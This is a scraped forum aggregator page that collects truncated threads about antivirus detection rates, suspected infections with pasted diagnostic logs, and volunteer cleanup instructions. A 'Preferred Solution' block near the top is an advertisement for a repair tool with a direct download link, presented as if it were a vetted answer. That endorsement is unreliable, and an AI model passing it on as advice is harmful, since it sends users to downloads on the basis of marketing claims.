Computer Support Forum

Malware detection and blacklist detection for Websites..sign up for free!

Question: Malware detection and blacklist detection for Websites..sign up for free!

Comodo SiteInspector has new features and it's for free to sign up. Good service for those who have own websites.

Relevance 100%
Preferred Solution: Malware detection and blacklist detection for Websites..sign up for free!

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

Answer: Malware detection and blacklist detection for Websites..sign up for free!

I saw this earlier, looks like they changed it from 30 days to 365 days.

These type of services from Comodo I like.

http://siteinspector.comodo.com/public

http://siteinspector.comodo.com/public/features

9 more replies
Relevance 96.76%

For anyone interested http://www.westcoastlabs.com/realTimeTesting/article/?articleID=1#item3

For many people, paying for an Internet Security Suite is either not an option or not a choice they?d like to make, depending on how you look at things. Luckily there are more than a few free software solutions on offer. For the testing of these we worked with West Coast Labs (WCL).

Thanks to West Coast Labs, PC & Tech Authority is providing its readers with real time access to the testing data from free security suites. This means you?ll be able to see the prevention rates as a percentage across the three vectors, as well as the average prevention rate for each service.
 

Answer:Free Antivirus: Real Time Anti-Malware Detection Rates

Thanks for the heads up

How come that panda, adware AV, COMODO AV and some others wheren't apart from this test? they are free. Four products is not enough

I really wonder why people make such a big deal of malware detection; what happens if it doesn't have detection for it through signature... In my eyes this means nothing and worthless test.
 

2 more replies
Relevance 89.38%

Okay i have turned my pc on after not having it on in 3 months (due to having to buy a new graphics card) anyway everything was running smooth untill i heard a few beeps only to see that avira has detected few viruses i had a choice to either remove or ignore so i pushed remove 10 minutes later avira is detecting the virus again so i click remove and then do a quick scan with Malwarebytes and it did not detect anything so i did a full scan with my Avira Anti Virus and it found 1 warning 13 hidden files and 30 detections now i would like to know what to do from here to completely get rid of the 30 detections that it has found the two that it has detected look like this: TR/BHO.ZWANGI.Trojan TR/GerVar.EJ Trojan there are 30 of them in my Avira quarantine so what i would like to know is where to go from here thank you.DDS (Ver_10-03-17.01) - NTFSx86 Run by DJ at 19:40:17.32 on Thu 09/09/2010Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_20Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.1023.518 [GMT -7:00]AV: AntiVir Desktop *On-access scanning enabled* (Updated) {AD166499-45F9-482A-A743-FDD3350758C7}============== Running Processes ===============C:\WINDOWS\system32\nvsvc32.exeC:\windows\system32\svchost -k DcomLaunchC:\windows\system32\svchost -k rpcssC:\windows\System32\svchost.exe -k netsvcssvchost.exesvchost.exeC:\windows\system32\spoolsv.exeC:\Program Files\Avira&... Read more

Answer:avira virus detection beeps with detection pop ups

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.We need to create an OTL ReportPlease download OTL from one of the following mirrors:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.In the custom scan box paste the following:CODEmsconfigsafebootminimalactivexdrivers32netsvcs%SYSTEMDRIVE%\*.exe/md5st... Read more

2 more replies
Relevance 89.38%

Okay i have turned my pc on after not having it on in 3 months (due to having to buy a new graphics card) anyway everything was running smooth untill i heard a few beeps only to see that avira has detected few viruses i had a choice to either remove or ignore so i pushed remove 10 minutes later avira is detecting the virus again so i click remove and then do a quick scan with Malwarebytes and it did not detect anything so i did a full scan with my Avira Anti Virus and it found 1 warning 13 hidden files and 30 detections now i would like to know what to do from here to completely get rid of the 30 detections that it has found the two that it has detected look like this: TR/BHO.ZWANGI.Trojan TR/GerVar.EJ Trojan there are 30 of them in my Avira quarantine so what i would like to know is where to go from here thank you.

Answer:avira virus detection beeps with detection pop ups

Hello,Please follow the instructions in ==>This Guide<==.Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<==If you can produce at least some of the logs, then please create the new topic. If you cannot produce any of the logs, then post back here and we will provide you with further instructions.

2 more replies
Relevance 84.87%

"Why Phishing Works" is a recent study (PDF) that examines phishing website techniques. The most visually deceptive website spoof in the study was able to fool 90% of the study's participants. That 90% figure includes the most technically advanced users among the participants. It was the look, not the spoofing of security features that did the job...f-secure.com/weblog

Answer:Flaw In Human Brain Prevents Detection Of Phishing Websites

Hi quietman7, help me out a bit please as I don't do electronic banking. Were they looking for you to give them you're ID,as on the left, Or both ID and password, as on the right?

3 more replies
Relevance 84.05%

I have every few days, after deleting it each time, seen a repeat detection in AVG Free 8 for Win XP the following detection: Object name HKLM\SOFTWARE\Omniquad Detection name Found Adware.RogueSuspectObject type registry keySDK Type CoreResult Moved to Virus VaultI recently noticed the above detection mentioned a couple of places on the web when I searched for info on it. A recent discussion appears in Yahoo Answers: Yahoo Answers discussion.I've come here to get your opinion and have followed your preparation guide for asking a question. I last removed it a couple of days ago and started to follow your prep directions before re-engaging AVG. I'm afraid that within a couple of days I'll see "Omniquad" detected again. I mostly use Zone Alarm and AVG 8 Free on a regular basis these days but am thinking of trying some other virus protection in the future. I do check periodically with Spybot, Spyware Blaster, and Ad-Aware from time to time.Below are my current results from your preparation requirements, although I really am just wondering if you have any idea what Omniquad is and why it shows up sometimes (since there is no Omniquad in my Add/Remove programs):--------------------------------------------------------------------------------KASPERSKY ONLINE SCANNER 7 REPORT Wednesday, July 16, 2008 Operating System: Microsoft Windows XP Home Edition Service Pack 3 (build 2600) Kaspersky Online Scanner 7 version: 7.0.25.0 Program database last ... Read more

Answer:Omniquad Detection In Avg Free In Xp

Hello and welcome to BCWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. We aim to provide the valuable service known to come from BC to every member we can, but sometimes it takes just a little longer to get to every request for help.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.Upon completing the steps below a staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.Thanks and again sorry for the delay. Please download Deckard's System Scanner (DSS) and save to your Desktop.alternate download siteDSS will do the following:Create a new System Restore point in Windows XP and Vista.Clean your Temporary Files, Downloaded Program Files, Internet Cache Files, and empty the Recycle Bin on all drives.Check some important areas of your system and produce a report for an analyst to review.Automatically run HijackThis. It will also install and place a shortcut to HijackThis on your desktop if you do not already have it installed. So if HijackThis is not installed and DSS prompts you to download it, please answer yes.You must be logged onto an account with administrator priv... Read more

3 more replies
Relevance 82.82%

Antivirus: Free vs. Paid Detection

Avira, Microsoft Security Essentials, Kaspersky and avast!






Quote:
Taking care of your system these days seems to be a less complicated task than it used to be a few years back. Now, protection against malware begins the moment you install your operating system. Windows 7 offers some basic security through Windows Defender and also provides a better solution under the shape of Microsoft Security Essentials, which is free of charge and can be installed on systems passing genuine validation. So, going with Windows 7 may be the winning hand after all.


Source: Antivirus: Free vs. Paid Detection - Avira, Microsoft Security Essentials, Kaspersky and avast! - Softpedia

Answer:Antivirus: Free vs. Paid Detection

You pay for ESET.

And thats the best.

Pretty much settles that.

9 more replies
Relevance 82.82%

Twice I posted the following query on the free AVG forum and twice it appears to have been deleted! Evn if they found the message embarrassing, I would have expected a personal reply. I would be pleased to receive comments (and answers!)


Can someone please explain to me why AVG is now finding viruses in files some of which were downloaded up to 6 months ago?
Most of the viruses found are described as "Virus found Proxy" although it also found "Trojan horse Downloader.Generic2.LKM and "Trojan horse BackDoor.Generic4.QSO".

The last file was found in a program that I downloaded last September!

I run a "Complete Test" every day.

One last question - What is the "Proxy" virus?
 

Answer:AVG (Free) Late Detection of Viruses

I'm not sure about the specifics, but what may be the case is that the virus definitions have only been picked up in the most recent update. Seems strange that it has taken 6 months though!

Does the file you downloaded seem likely to contain viruses, or was it from a trusted source?
 

14 more replies
Relevance 82.82%

Hi. I am trying to maximize/optimize my security (and functioning) on my laptop (Dell Dimension M6300 running Windows Pro XP SP3). I have wireless internet connection (used primarily in my house) using an Intel PRO/Wireless 3945ABG Network Connection adaptor via router to cable high speed internet.

I am currently using the following security/updating/patching methods:
1. AVG Free 8.5
2. SuperAntiSpyware (Free Edition)
3. Malwarebytes' Anti-Malware (Free Edition)
4. Spyware Blaster
5. Windows Firewall
6. CCleaner
7. FileHippo Update Checker
8. Microsoft/Windows Update & Automatic Update
9. Microsoft Baseline Security Analyzer
10. Windows Disk Defragmenter
11. Sysinternals PageDefrag
12. Sysinternals AutoRuns
13. Sysinternals ProcessExplorer
14. HiJackThis
15. Chkdsk (checking "Scan for and attempt recovery of bad sectors")
16. Disk Cleanup
17. Host File using Windows XP MVP List
18. Glary Utilities
19. CWShredder
20. ERUNT & NTREGOPT
21. Online scans using the following: Kaspersky A/V, WindowsLive OneCare, Panda ActiveScan, TrendMicro HouseCall

So I have a couple of questions about this (overkill). I feel like I am spending more time running security scans, checking for updates, etc., etc., than the time I spend doing all other things combined on the computer, which is not a good thing. I am not knowledgeable enough to know which of these things are complete overlap, or a complete waste of time, or how frequently to run each of t... Read more

Answer:Does AVG Free 8.5 offer rootkit detection?

Hello,

I'm shifting this to the Antivirus and Security programs forum. ~ OB

6 more replies
Relevance 82.82%

Avira, Microsoft Security Essentials, Kaspersky and avast! put to the test.
A very interesting read...not comprehensive but informative:

Antivirus: Free vs. Paid Detection - Avira, Microsoft Security Essentials, Kaspersky and avast! - Softpedia

Answer:Antivirus: Free vs. Paid Detection

I either use the free versions of Avast or Avira (sans nag screen ) for my installations + common sense , I've done pretty well in remaining clean.

Testing 'sus' files in a VM also helps as well.

And if I ever do get infected, well I got what I paid for

5 more replies
Relevance 82%

AV-Comparatives' test only considered the premium version, but how much worse are the numbers usually for the free version?
 

Answer:Avira Free detection rates vs Premium's

based on their site's comparison these are the differences between the free and the premium version.
 

9 more replies
Relevance 82%

Hi There,

I recently had a case of windows police pro rogue antivirus on my pc. I was able to get rid of that but now I keep getting an infection notice from my AVG Free Resident shield detection saying C:\\WINDOws\system32\gasfkyibcrqkoi.dll. Any help will be great!

Answer:gasfkyibcrqkoi.dll AVG Free Resident shield detection

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Relevance 82%

So some minutes ago my antivirus denied access to some temp file I never rember gettin, PUA Candy gen or something along those lines. I scaned the whole temp folder and found another virus identical to this 1 and a couple of suspicious files. Needles to say I am curently scanning the drivers for more viruses. I deleted the whole temp folder.
I'm not sure if I should be afraid, rework my passwords or what else, I don't usually get viruses as I scan every download so i don't know where those came from.
Any suggestions?

More replies
Relevance 82%
Question: Malware detection?

Dear Sirs,

AVG recently detected a trojan dropper and removed it in safe mode. Shortly afterwards, Rapport detected "Tilon" malware and "attempted removal" but did not confirm it had done so.
I scanned with Malwarebytes which did not detect anything. I tried their Rootkit removal tool which refused to run until I used their Chamelion application. It gave me the message "dda driver missing" but the program did run after a reboot - as per instructions. Again, did not detect anything.

I then followed your methodology for malware scanning and attached the logs. I have not yet "fixed" anything -as per your instructions.

I do not seem to be having any obvious problems but would be glad if you are able to advise if I need to do anything else or confirm if everything is OK as I use Windows 7 for internet banking.

Many thanks in advance for all your help.
Regards,
Dave.

Computer: Desktop Core i3, Dual boot Windows 7 and XP
 

Answer:Malware detection?

Welcome to Major Geeks!

You logs are clean. The only issue I notice is that your AVG software seems to be rather out of date. Per your logs it is either AVG10 or AVG2011 and the current version is AVG 2013.


Since you are not having malware problems, it is time to do our final steps:

We recommend you keep Malwarebytes Anti-Malware for scanning/removal of malware.

Go back to step 4 oof the READ ME and renable your Disk Emulation software with Defogger if you had disabled it.
Go to add/remove programs and uninstall HijackThis. If you don't see it or it will not uninstall, don't worry about it. Just move on to the next step.
If running Vista or Win 7, it is time to make sure you have reenabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
Goto the C:\MGtools folder and find the MGclean.bat file. Double click ( if running Vista, Win7, or Win 8 Right Click and Run As Administrator ) on this file to run this cleanup program that will remove files and folders related to MGtools and some other items from our cleaning procedures.

Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.

After doing the above, you should work thru the below link:
How to Protect yourself from malware!
 

3 more replies
Relevance 82%
Question: malware detection

need help my computer is acting crazy....Logfile of Trend Micro HijackThis v2.0.2Scan saved at 10:49:10 AM, on 5/18/2010Platform: Windows Vista SP2 (WinNT 6.00.1906)MSIE: Internet Explorer v8.00 (8.00.6001.18904)Boot mode: NormalRunning processes:C:\Windows\system32\taskeng.exeC:\Windows\system32\Dwm.exeC:\Windows\Explorer.EXEC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\Common Files\Java\Java Update\jusched.exeC:\Windows\System32\wpcumi.exeC:\Windows\System32\rundll32.exeC:\Program Files\Microsoft Security Essentials\msseces.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Windows\ehome\ehtray.exeC:\Program Files\Windows Media Player\wmpnscfg.exeC:\Windows\ehome\ehmsas.exeC:\Windows\system32\wuauclt.exeC:\Program Files\Acer\Empowering Technology\NotificationCenter\Framework.NotificationCenter.exeC:\Windows\System32\wercon.exeC:\Users\jen\AppData\Local\Google\Chrome\Application\chrome.exeC:\Users\jen\AppData\Local\Google\Chrome\Application\chrome.exeC:\Windows\system32\SearchFilterHost.exeC:\Program Files\Trend Micro\HijackThis\HijackThis.exeR1 - HKCU\Software\Microsoft\Interne... Read more

Answer:malware detection

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.1.Please do not run any other tool untill instructed to do so!2.Please reply to this thread, do not start another!3.Please tell me about any problems that have occurred during the fix.4.Please tell me of any other symptoms you may be having as these can help also.5.Please try as much as possible not to run anything while executing a fix.If you follow these instructions, everything should go smoothly.Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.I would like to get a better look at your system, please do the following so I can get some more detailed logs.DeFogger: Please download DeFogger to your desktop.Double click DeFogger to run the tool. The application window will appear Click the Disable button to disable your CD Emulation drivers Click Yes to continue A 'Finished!' message will appear Click OKDeFogger may ask you to reboot the machine, if it does - click OKDo not re-enable these drivers until otherwise instructed.IMPORTANT! If you receive an error message while running DeFogger, please post the log defogger_disable which will appear on your desktop.Download DDS:Please download DDS by... Read more

3 more replies
Relevance 82%

Hello, BC. Thanks for taking the time to help me deal with my malware problem. I suspect I may have an advanced spyware infection on my PC. If you can help me with analyzing these logs I would really appreciate it. If you need me to run any scans just let me know and I can send you more log files, or if you need any info in general. All help is greatly appreciated. Thank you.
-DukhaNirodha
 
DDS LOG
 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 8.0.7601.17514
Run by House at 5:58:03 on 2014-03-31
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.4086.1592 [GMT -7:00]
.
AV: Panda Cloud Antivirus *Enabled/Updated* {3456760B-FDAA-FFFD-06C2-7BB528D2066C}
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: 360 Internet Security *Enabled/Updated* {2B66EE1E-E5C8-C2F7-648F-4E55AC68D37D}
SP: 360 Internet Security *Enabled/Updated* {90070FFA-C3F2-CD79-5E3F-7527D7EF99C0}
SP: Panda Cloud Antivirus *Enabled/Updated* {8F3797EF-DB90-F073-3C72-40C753554CD1}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
FW: Cloud Antivirus Firewall *Disabled* {0C6DF72E-B7C5-FEA5-2D9D-D280D6014117}
FW: Online Armor Firewall *Enabled* {BD3F5FCA-866B-1E2E-0A68-58900A751EA1}
.
============== Running Processes ===============
.
C:\PROGRA~2\AVG\AVG2014\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2014\avgcsrva.... Read more

Answer:Please Help w/ Malware Detection

I accidentally posted this twice you can remove this one if you want.

5 more replies
Relevance 82%

Hello, BC. Thanks for taking the time to help me deal with my malware problem. I suspect I may have an advanced spyware infection on my PC. If you can help me with analyzing these logs I would really appreciate it. If you need me to run any scans just let me know and I can send you more log files, or if you need any info in general. All help is greatly appreciated. Thank you.
-DukhaNirodha
 
DDS LOG
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 8.0.7601.17514
Run by House at 5:58:03 on 2014-03-31
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.4086.1592 [GMT -7:00]
.
AV: Panda Cloud Antivirus *Enabled/Updated* {3456760B-FDAA-FFFD-06C2-7BB528D2066C}
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: 360 Internet Security *Enabled/Updated* {2B66EE1E-E5C8-C2F7-648F-4E55AC68D37D}
SP: 360 Internet Security *Enabled/Updated* {90070FFA-C3F2-CD79-5E3F-7527D7EF99C0}
SP: Panda Cloud Antivirus *Enabled/Updated* {8F3797EF-DB90-F073-3C72-40C753554CD1}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
FW: Cloud Antivirus Firewall *Disabled* {0C6DF72E-B7C5-FEA5-2D9D-D280D6014117}
FW: Online Armor Firewall *Enabled* {BD3F5FCA-866B-1E2E-0A68-58900A751EA1}
.
============== Running Processes ===============
.
C:\PROGRA~2\AVG\AVG2014\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2014\avgcsrva.e... Read more

Answer:Please Help w/ Malware Detection

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully. First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding. Perform everything in the correct order. Sometimes one step requires the previous one. If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem. Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me. Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts. If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed. Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean. My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.   Multiple Antivirus Programs installed!I do not recommend that you have more than one anti-virus product installed and running on your computer at a time.The reason for this is that if both products have their automatic (Real-Time) protection switched on, then those products which... Read more

6 more replies
Relevance 81.18%

Donna Buenaventura, a security software expert and MVP, wrote a comparative review on BrightHub.com: Whis is the Best? A-squared Free Vs Malwarebytes' Anti-Malware

Answer:a-squared Free outperforms Malwarebytes in detection and removal!

I always take note of what Donna says. I did like her conclusion that since they are both free get them both, and why not.

9 more replies
Relevance 81.18%

Recently, my Mozilla browser started opening up unwanted tab sessions. It kept occurring at such a fast rate that I couldn't close out the tabs or browser itself so I had to reboot the laptop.

My computer is already running avast! Antivirus and SuperAntiSpyware Professional edition, with negative findings after updates and scans from each.

I was concerned so I downloaded Microsoft Security Essentials (before I knew how slow it runs).

When I ran it, it discovered two items:

TrojanDownloader:Java/OpenConnection.OS
Exploit:Java/CVE-2010-0840.DR

First, how do I know these are legitimate malware items?

Second, I know no software can detect everything 100% of the time, but I'm surprised at least one of these programs didn't detect these two items, if they are real.

Third, could these two items be the cause of the tabs opening up on my Mozilla browser?
 

Answer:Malware detection question

It is hard to answer your questions based on that info. If you want us to check your system for malware, please do the following:

READ & RUN ME FIRST. Malware Removal Guide
 

3 more replies
Relevance 81.18%

How can we detect any malware or spyware installed in our PC without our knowledge?

Answer:Malware/Spyware detection

Perform scans with your anti-virus and anti-malware software such as Malwarebytes Anti-Malware.List of Free Scan & Disinfection Tools to supplement your anti-virus or get a second opinionFrom that list, I would recommend any (or a combination) of the first seven, especially these...Emsisoft AntiMalware, Emsisoft Emergency Kit, Zemana AntiMalware and the Kaspersky Virus Removal Tool.You can also supplement your anti-virus or get a second opinion by performing an Online Virus Scan. ESET is one of the more effective online scanners.

3 more replies
Relevance 81.18%

Can someone give me a program name or link to check my computer for these issues?
 

Answer:Malware & Spyware Detection

I ran a Combo Fix and here is the results.

ComboFix 07-08-17.2 - "Angela" 2007-08-21 20:02:17.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.508 [GMT -5:00]
* Created a new restore point
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
C:\DOCUME~1\Angela\Desktop\internet.lnk
C:\WINDOWS\system32\x64
((((((((((((((((((((((((( Files Created from 2007-07-22 to 2007-08-22 )))))))))))))))))))))))))))))))
2007-08-21 20:00 51,200 --a------ C:\WINDOWS\nircmd.exe
2007-08-21 19:47 <DIR> d-------- C:\WINDOWS\system32\ActiveScan
2007-08-21 18:54 <DIR> d-------- C:\WINDOWS\LastGood
2007-08-21 18:50 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\Uniblue
2007-08-21 08:02 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\ColtsScreenServer
2007-08-12 13:17 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\APPLIC~1\Trymedia
2007-08-12 13:17 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\APPLIC~1\Oberon Media
2007-08-12 11:50 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\Big Fish Games
2007-08-11 20:54 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\Magic Academy
2007-08-01 17:37 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\SpinTop
2007-07-29 17:24 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\APPLIC~1\SpinTop Games
2007-07-28 14:59 <DIR> d-------- C:\Program Files\iTunes
2007-07-28 14:59 <DIR> d-------- C:\Program Files\iPod
2007-07-26 21:05 <DIR> d-------- C:\DOCU... Read more

3 more replies
Relevance 81.18%

Hi,
I just want to know if Malware infection can be detected by ATA on a domain controller that is being mirrored/monitored by it.
David

Akinzo

More replies
Relevance 81.18%

Hai,

My sites http://heathrow-taxi-booking.co.uk and http://gatwick-taxi-booking.co.uk have received the messages "Malware detected on heathrow-taxi-booking.co.uk and Malware detected on gatwick-taxi-booking.co.uk " from bing. They were mentioned a reason as Reference to known malware distribution network detected. This could be via inclusion of an iframe or frame tag, an embedded object, or a script tag".But i have checked my site from experts and result was clean.Hosting company also confirmed it.But bing disabled the link for sites.

Can anyone will give solution for this problem..?Thanks in advance

Answer:Malware detection by Bing

Please download MiniToolBox, save it to your desktop and run it.Checkmark the following checkboxes:Flush DNSReport IE Proxy SettingsReset IE Proxy SettingsReport FF Proxy SettingsReset FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Users, Partitions and Memory size.Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.Note: When using "Reset FF Proxy Settings" option Firefox should be closed.Download TDSSKiller and save it to your desktop.Extract (unzip) its contents to your desktop.Open the TDSSKiller folder and doubleclick on TDSSKiller.exe to run the application, then on Start Scan.If an infected file is detected, the default action will be Cure, click on Continue.If a suspicious file is detected, the default action will be Skip, click on Continue.It may ask you to reboot the computer to complete the process. Click on Reboot Now.If no reboot is require, click on Report. A log file should appear. Please copy and paste the contents of that file here.If a reboot is required, the report can also be found in your root directory (usually C:\ folder) in the form of TDSSKiller_xxxx_log.txt. Please copy and paste the contents of that file here....ADW CleanerPlease download AdwCleaner by Xplode and save to your Desktop.Double-click on AdwCleaner.exe to run the tool.Vista/Windows 7/8 users right-click and select Run As Administrator.C... Read more

2 more replies
Relevance 81.18%

I have been posting in t "Networking" forum and have gotten very much useful information. I am just wondering how to detect Malware and Spyware that don't show up with my Malwarebytes or Mcafee programs.
Thanks a bunch
 

Answer:Secret Malware Detection

16 more replies
Relevance 81.18%

Hi,

You've saved my life before and I'm hoping you can step in again!

I started up my PC recently and received a warning from AntiVir about Malware. The warning appeared as a pop-up window in the bottom right of the screen and gave me the option to remove the detected files (14 of them), which I did. Antivir then did a quick repair/scan and popped up a similar warning, with a different number of files detected (83!). Again, I clicked Remove and the same thing happened, with another warning appearing. At this point I got a little suspicious.

The AntiVir details mentioned TR/Dldr.Agent.gbnx as being detected.

I've attached/pasted the logs below.

Thank you in advance for any help you can offer.

Chris.

--- TSG File ------------
Tech Support Guy System Info Utility version 1.0.0.1
OS Version: Microsoft Windows XP Professional, Service Pack 3, 32 bit
Processor: AMD Athlon(tm) , x86 Family 6 Model 10 Stepping 0
Processor Count: 1
RAM: 2559 Mb
Graphics Card: NVIDIA GeForce2 GTS/GeForce2 Pro, 64 Mb
Hard Drives: C: Total - 78152 MB, Free - 11607 MB; E: Total - 476937 MB, Free - 287881 MB; K: Total - 305242 MB, Free - 98556 MB;
Motherboard: ASUSTeK Computer INC., A7N8X2.0, REV 2.xx, xxxxxxxxxxx
Antivirus: AntiVir PersonalEdition Classic Virus Protection, Updated: Yes, On-Demand Scanner: Enabled

-----------------------
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 20:39:12, on 21/04/2011
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explore... Read more

Answer:Repeated Malware detection

11 more replies
Relevance 81.18%

The traditional signature-based method to detect viruses and other malware is increasingly seen as an insufficient defense given the rapid pace at which attackers are churning out virus and spyware variants....The three security vendors that dominate the antivirus market today, McAfee, Symantec and Trend Micro, say they have no intention of abandoning signature-based defense...However, the big three vendors acknowledge there?s a need to augment this decades-old methodology...in its next enterprise antivirus release planned for this summer, Symantec will include whitelisting technology for policy-based control of applications down to a software-component level...Symantec will also make use of behavior blocking that promises to be able to stop at least some malware from executing...networkworld.com

More replies
Relevance 81.18%

Hi There,

I'm hoping someone can point me in the right direction here....

You may have heard of a trojan called Generic!atr, well my computer got that and when I started it up, there was no start/tool bar or any icons on my computer.

Using the task manager, I was able to get McAfee running and it picked up that trojan and two other potentially unwanted programs.

Once that was done, I was advised (by someone) that I should try and re-load XP, so I did - only finding out afterwards that I should have just done a system restore to an earlier date and fixing it from there - but I didn't and now I can't because XP has been reloaded, so there is no previous restore dates for it to restore from.

So through safe mode I managed to turn off system restore so I could run another scan and see if it would pick anything else up.

My computer is still not loading with the task bar or any icons, and would be so GRATEFUL and appreciate if anyone knows anyway I can manually get rid of this damn problem and get my XP back running properly.

Sorry if I posted this in the wrong spot but if anyone can point me into some direction where I can get the help I need I would be indebted!

Thank you!

PS I have been searching and searching on-line for days to find some solution but they all seem to have basic solutions using the system restore - which is a no go for me.

Answer:XP pro problem after malware detection

re-install windows again. this time format the drive. Since you've lost your original data, all thats left to lose is some of your time.
good luck

3 more replies
Relevance 81.18%

Mcafee has been alerting me of some malware it found by the name of Adware-bho.gen.c Please see HJT log below to help me track this badboy down! Thanks:Logfile of Trend Micro HijackThis v2.0.2Scan saved at 8:55:05 AM, on 1/13/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16762)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\WLTRYSVC.EXEC:\WINDOWS\System32\bcmwltry.exeC:\Program Files\Lavasoft\Ad-Aware\aawservice.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exeC:\Program Files\Broadcom\ASFIPMon\AsfIpMon.exeC:\Program Files\Bonjour\mDNSResponder.exeC:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exeC:\Program Files\MozyPro\mozyprobackup.exeC:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.exeC:\Program Files\Dell\QuickSet\NICCONFIGSVC.exec:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exeC:\WINDOWS\system32... Read more

Answer:Adware-bho.gen.c Malware detection

